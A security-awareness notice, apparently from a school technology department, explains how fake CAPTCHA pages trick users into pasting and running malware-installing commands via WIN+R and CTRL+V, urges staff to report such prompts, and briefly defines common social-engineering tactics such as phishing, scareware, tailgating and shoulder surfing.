Many websites use CAPTCHA prompts (those small prompts asking you to confirm you’re not a robot) as a security measure. Unfortunately, malicious actors are now mimicking these prompts in a new method of attack that can compromise your computer with just a few keystrokes.
These fake CAPTCHA attacks are becoming more common and are quite effective because they often appear on websites that users trust, such as news and educational websites. The goal is to trick users into unknowingly run commands that install malicious software.
How the attack works
A user visits a legitimate website that has unknowingly allowed a malicious advertisement to be displayed through a 3rd party ad server. When the ad appears, the user is redirected to a maliciou site displaying a fake CAPTCHA. After a user clicks the CAPTCHA checkbox, a prompt appears asking them to press a combination of keys like WIN+R, CTRL+V and Enter (example below).
These inputs launch a script on the user’s machine that silently downloads and installs malware. Because this attack mimics routine behavior and comes from sites that we normally trust, it can be quite deceptive.
What should you do?
If a CAPTCHA prompt ever asks you to press keyboard shortcuts like WIN+R or CTRL+V, DO NOT follow these instructions. A legitimate CAPTCHA will never require keyboard input beyond clicking a checkbox, selecting images, typing characters or sliding.
If you encounter any unusual prompts or website behavior, report it to technology right away. Quick reporting allows us to take immediate action and helps protect our staff, students, and community from these malicious actors.
In case you were wondering, (Completely Automated Public Turing test to tell Computers and Humans Apart).
Phishing is a digital form of social engineering that uses authentic-looking emails to trick users into sharing personal information. It usually includes a link that takes the user to a fake website. If you cannot verify the source, do not open the link. Report suspicious messages to your IT team.
Social media exploitation is where the attacker uses information found on a user’s social media profiles to create a targeted phishing attack.
Fake IT Support calls are a common form of impersonation where someone pretends to be an authorized user or administrator in an attempt to gain illicit access to protected data systems. The attacker has enough information to sound credible, and they ask the user for some bit of information that will allow the attacker to gain access to the desired system.
Scareware is a type of baiting where the use of false alarms or fictitious threats lure the user into a trap. One example is the attacker convincing a user that their system is infected with malware and that they should install software granting remote access. Another example is the attacker claiming to have sensitive videos which will be released if the user does not pay.
Tailgating, also known as “piggybacking”, is where an unauthorized person manipulates their way into a restricted area, such as impersonating a well-known role (e.g., delivery driver or custodian worker) or asking a user to “hold the door”.
Shoulder surfing is where an unauthorized person stands near a user to get the user’s password or other data from the user’s computer monitor.
